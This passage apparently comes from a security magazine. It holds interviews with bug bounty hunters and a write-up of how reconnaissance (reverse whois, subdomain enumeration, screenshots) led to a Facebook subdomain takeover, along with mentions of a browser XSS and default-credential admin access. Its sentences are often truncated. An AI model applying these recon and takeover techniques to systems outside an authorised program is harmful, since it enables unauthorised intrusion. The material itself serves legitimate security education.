But for in-depth understanding you should try solving CTF challenges from PentesterLab, Web Security
Once you are confident that you have a good understanding of OWASP Top 10 then you can start
Also, don’t stick to web apps testing only, always try to expand your knowledge of other areas (mobile
app testing, thick client testing, wireless network testing, etc.) as well.
RAKESH MANE
[H9]: Can you share a story of your best bounty with us? One that made you proud?
Or was memorable?
[RM]: One of my best bugs is the Universal XSS (Cross Site Scripting) in the Opera Mini for iOS browser. I
was actually testing a web application for an XSS vulnerability on a redirecting endpoint. Luckily, I noticed
one strange behaviour in this browser. The behaviour was the browser was executing the javascript in the
context of domain from where the redirection was initiated so if I could initiate the redirection from
So, basically, I could have XSS on any domain that allowed posting links.
[H9]: Do you have any thoughts or experiences you would like to share with our
[RM]: Bug hunting may seem very lucrative but it can also be very frustrating sometimes. Having patience
Also, it’s important to keep updated with new techniques and attacks. Doing research and finding new
attack vectors are going to help you in the long run. Always try to explore the unexplored areas.
HOW RECON Sudhanshu Rajbhar
HELPED ME TO
FIND A
FACEBOOK
DOMAIN
TAKEOVER
131
HOW RECON HELPED ME TO FIND A
FACEBOOK DOMAIN TAKEOVER
I hope you all are doing good. In this writeup I am going to tell you how I was able to take over a domain that was
owned by Facebook.
Short Story
After my final exams were over, I set some goals in which FB Hall of Fame (HoF) was one of them. I had to go
through some N/As and informative reports. But finally, I did it.
Here we go
So if you go to https://www.facebook.com/whitehat/info/ you will find that their acquisitions and partnerships are
also in the scope of their program. You can say that everything they own is in scope except for a few domains. So
without wasting time, I started collecting the domains owned by Facebook.
What’s the best way to find all the domains owned by a particular company?
whois facebook.com
Look at the Registrant email - it’s [email protected] and you can use this email to find all the other sites which have
the same registrant email as facebook.com
https://tools.whoisxmlapi.com/reverse-whois-search ([email protected])
We got around 2,756 unique domains that all have “[email protected]” in their whois scan result.
Don’t stop there, we can still get some more domains. Last time we used the Registrant email, this time we will use
the Registrant Name - let’s see the difference now.
Cool, this time we get more domains than before, around 3,441. Now let’s remove the duplicate ones. Save all this
in one file. Then:
So finally we have around 4k unique domains that have either Facebook Inc or [email protected] in their whois scan
result. You can still get some more domains - use something else this time besides registrant email or name that
you found in the already collected domains.
After I collected all the domains, I used the filter-resolved tool by @tomnomnom, to resolve all the domains.
Then I used subfinder, to find all the subdomains of the domains that were in the live-domains.txt file.
Repeating the same process again, use filter-resolved for resolving all the subdomains we found using subfinder.
Moving towards the last step, I used webscreenshot for taking screenshots of the subdomains.
HOW RECON HELPED ME TO FIND A
FACEBOOK DOMAIN TAKEOVER
And while going through the screenshots I found this domain www.buckbuild.com
Then I uploaded something to verify whether the takeover was successful or not. And yeah!! Here we go, I found
my first subdomain takeover.
.
HOW RECON HELPED ME TO FIND A
FACEBOOK DOMAIN TAKEOVER
POC time:
Timeline:
July 12 — Fixed
Thank you for reading it till the end. I hope you enjoyed reading it.
One thing I want to share is after the screenshot part was done, I didn’t bother to look at them as they all looked the
same. I thought there was no point in going through them since other hunters might have already looked at those
domains, so I left it. Then after two or three days, I looked at it again and you all know what happened next.
Guys, believe in yourself! Don’t feel like you will not find anything just because others are also looking at the same
thing and you think your chance is less of finding something there.
Sudhanshu Rajbhar
I started my journey on hackerone on June 1 , this was the time when I submitted my first bug
to a private company. Since then I am active on hackerone finding bugs and reporting them.
[Hakin9 Magazine]: Hello Júlio César! Thanks for taking an interview with us –
we’re honored! How have you been doing? Can you tell us something about
yourself?
[Júlio César]: Thanks for having me. I’m doing great, thanks for
much as I need. I only sleep like 4 hours a day and since I only sleep
hours a day, Monday to Monday. Since I enjoy what I do, I don’t see
[JC]: I started doing bug bounty hunting when I heard about the hackerone platform. I was very excited
to find out that I could legally hack all the companies that had a program running on hackerone. Besides
hacking, it was a great opportunity to learn a lot of stuff since I was hacking real web applications and
mobile applications plus I could make some cash by helping those companies secure their system. Then I
[JC]: First of all, you have to understand how things work. So if you want to hack web applications, you
have to learn how a web application works. You need to understand how each component or technology
that is used to create a web application works. Take your time to understand the technology behind the
web application. Take some programming classes to understand how programming works. You don’t
have to become a programmer, but being able to understand the logic behind programming will help
you a lot down the road. The same applies to mobile hacking or host hacking.
There are a lot of books out there. I’m going highlight a few of them:
[H9]: This is an impressive list of books! What about the online resources? Any
recommendations?
[JC]:
• https://portswigger.net/web-security
• https://www.hacker101.com/
• https://forum.bugcrowd.com/
• https://www.bugcrowd.com/hackers/bugcrowd-university/
[H9]: Do you participate in any CTFs? If so, can you tell us which ones and your
[JC]: I did a local CTF once and that was it. It think CTFs are a great place to learn hacking, but to be
honest CTF is not my thing. I don’t have anything against CTFs, I just don’t like to play.
JÚLIO CÉSAR
[H9]: What about bug bounty communities? Do you think it’s important to join
them?
[JC]: I’d rather spend time on a bug bounty community instead of playing CTF. Anyone doing bug
bounty hunting should definitely join a bug bounty community. Bug bounty communities are great to
meet new people and also a great place to learn hacking. You are going to be surprised how willing
[H9]: What does the process usually look like, working with a company you report
Do you form a relationship with the companies you report bugs to?
[JC]: The process is very simple. Whenever you report a vulnerability to any program, your report needs
to be as clear as possible in terms of what this vulnerability is all about. How do you exploit it? What’s the
impact on the business? What is the mitigation? Don’t forget to create the PoC. There is no contract
between the bug bounty hunter and the program. All the legal stuff is carried out by the platforms, like
hackerone or bugcrowd.
Depending on how good your reports are and how often you report vulnerabilities to the same program,
you usually end up creating some kind of relationship with the company. Sometimes this relationship will
[JC]: Burp suite is my favorite tool, especially when testing web applications or APIs. 99% of the time
when I’m testing web application or APIs, I use only Burp Suite. I don’t use anything else, just Burp Suite.
To be honest, I don’t even remember when was the last time that I used any custom script or any other
[H9]: Let's say, as a complete beginner, I want to become a bug bounty hunter. What
[JC]: I’m assuming you already know how to hack. If that’s the case, go to hackerone or bugcrowd and
pick up a public program. Go through the program page and read all the information provided by the
program. Understanding how to program works is very important. Pay attention to what they are looking
for in terms of acceptable vulnerabilities. Pay close attention to the provided scope (always stay in
scope). After getting all the information that you need, start your recon process and happy hacking.
[H9]: Can you share a story of your best bounty with us? One that made you proud?
Or was memorable?
[JC]: My best bounty was my first one. Because of my ranking on the DOD program on hackerone, I was
invited to a private program. This program had been running for more than a year when I got there.
JÚLIO CÉSAR
I thought, well there is nothing here for me. I saw some notable hacker’s names on the top 5 ranking and
because of that I decided not to do anything. About two weeks after that I came back to the program
and decided to give it a shot. I did my recon and on the third day, I think, I found a reflected XSS. I was
excited but then I thought, well it has to be a duplicate, I mean, this program has been running for more
than a year. How could someone have missed this obvious XSS? So I submitted the report to hackerone
and on the next day I got an email about the report from hackerone. Since I was not on the platform
when I got the email I thought, well duplicate as I have predicted but to my surprise, the report was
accepted and they paid me $350 for the report. I quickly went back to the program and started doing
some parameter fuzzing. I then found a second reflected XSS. As usual I thought this one has to be a
duplicate. So I submitted the report to hackerone and the report was accepted and they paid me
another $350. I ended up finding another three reflected XSS and they also paid me $350 for each one.
Bottom line, don’t ever assume anything. Just because a program has been running for some time
[H9]: Do you have any thoughts or experiences you would like to share with our
[JC]: Don’t rush to report anything. Make sure whatever you are about to report actually has an impact on
the target. Don’t report things like possible subdomain takeover, text injection, cookie flags issues,
WordPress version, or web server version. If you can’t create a valid PoC showing the impact on the
JÚLIO CÉSAR
target, don’t waste your time and the security team’s time reporting such things, especially on platforms
Also, don’t use scanners while doing bug bounty. Most platforms forbid the use of scanners for obvious
reasons.
Before trying anything, you have to try to understand how the application or the mobile app works. Try to
[Hakin9 Magazine]: Hello Shivam! Thanks for taking an interview with us – we’re
honored! How have you been doing? Can you tell us something about yourself?
[Shivam Kamboj Dattana]: Hi there! I’m Shivam Kamboj Dattana aka ‘sechunt3r’.
I'm a Computer Science Student + bug bounty hunter and I am from India. I
started doing bug bounties almost two years back and I hunt on all platforms,
[SKD]: Well, before coming into bug bounties, I used to do SQLi challenges and
But one day, my old online friend introduced me to bug bounties and from that
learning/understanding things and started finding loopholes in companies. During that time, I learned
lots of things about bug bounty hunting from my seniors and juniors so I implemented those
[H9]: Is it your full-time job? Or is it something else that you do for a living?
[SKD]: Yes, doing bug bounties is my full time job and apart from it, I manage to do other things like
playing indoor and outdoor games with my friends and spend some quality time with my family and
loved ones.
[SKD]: Firstly, get comfortable with the basic things. Once you have a basic knowledge about all these
Internet, Protocols, HTTP, TCP/IP, Networking, Linux, JavaScript, Python, PHP, Bash, pick any
Because most of the bug bounty programs focus on Web Applications, I suggest resources regarding
web applications.
1. Books:
• Breaking into Information Security: Learning the Ropes 101 by Andy Gill
SHIVAM KAMBOJ DATTANA
• The Web Application Hacker's Handbook: Finding and Exploiting Security Flaws by Dafydd
Stuttard and Marcus Pinto
2. Youtube Channels:
3. Writeups/Blogs:
• Hackerone Hacktivity
Finally, practice a lot and try harder or think outside of the box.
[H9]: Do you participate in any CTFs? If so, can you tell us which ones and your
[SKD]: Yeah, I participated in a few CTFs just to increase my knowledge or sharpen my skills.
• https://ctf.hacker101.com/
• https://www.hackthebox.eu/
• TCS Pvt Ltd. Public CTF & Other few Public CTFs
In my opinion, Hackthebox and Hackerone are the best platforms to enhance your Skills. They both
provide the best CTFs, it's up to you whether you choose an easy one or complex one. Basically,
complex ones take a longer time to solve. So maybe sometimes you have to take the help of other
security researchers to solve that CTF, but at the end it would be fun to complete the CTF challenges.
SHIVAM KAMBOJ DATTANA
I personally thank both websites for providing CTFs because I learned so many new things while playing
[H9]: What about bug bounty communities? Do you think it’s important to join
them?
[SKD]: Yes, according to me it's important to join a bug bounty community, because whenever you’re
stuck anywhere in bug bounties you can ask them about your problem and they freely help you with your
respective problem. If I pick my example, there are lots of people who helped me learn about bug
bounties and they motivate you whenever you distracted. So it's good to be in a community.
[H9]: What does the process usually look like, working with a company you report
Do you form a relationship with the companies you report bugs to?
[SKD]: No, it's not like that. Actually, companies have responsible disclosure pages where they mention
that any security researcher or bug bounty hunter can audit the website and if they find any bugs then
they report that to the security team of that company. So it's a very simple thing. We don't sign any
contract with any company because if the company has a bug bounty program, we start auditing or
Nowadays, there are lots of platforms available for bug hunting. Basically, they provide target websites
with their Inscope and bounty table so if we find any bugs, we report the bugs via that platform and
Platform's:
• Bugcrowd - https://www.bugcrowd.com/
• Hackerone - https://www.hackerone.com/
• Synack - https://www.synack.com/
[H9]: What kind of issues do you run into when working with a company, if any?
[SKD]: Like other hackers, I have my own methodology to doing bug bounty hunting and I follow my own
approach to find loopholes in websites. I look for all kinds of issues like Logical, OWASP top 10 web App,
API Bugs.
[SKD]: Burp Suite helps to manipulate the data sent from the front to the back side of the application. It
also can send many requests with just one click and Burp Suite provides lots of features or tools that are
Lazyrecon helps to gather some information about target like finding subdomains + Headers information
[H9]: Let's say, as a complete beginner, I want to become a bug bounty hunter. What
• Learn Basic Concepts of Programming languages like PHP, JS, Bash, Python, HTML.
• Choose Points Based companies because they are so easy to hunt for bugs.
[H9]: Can you share a story of your best bounty with us? One that made you proud?
Or was memorable?
[SKD]: Yeah, actually that's my first four digit bounty from a private program from hackerone and it took
Using the default credentials, I was able to get access to that Admin panel, then I rapidly make a video
[H9]: Do you have any thoughts or experiences you would like to share with our
[SKD]: Try to learn new things everyday, read a lot of writeups, focus on researcher, be creative, use your
imagination, try to find some P1 bugs, have patience if you are a beginner, be humble, help others.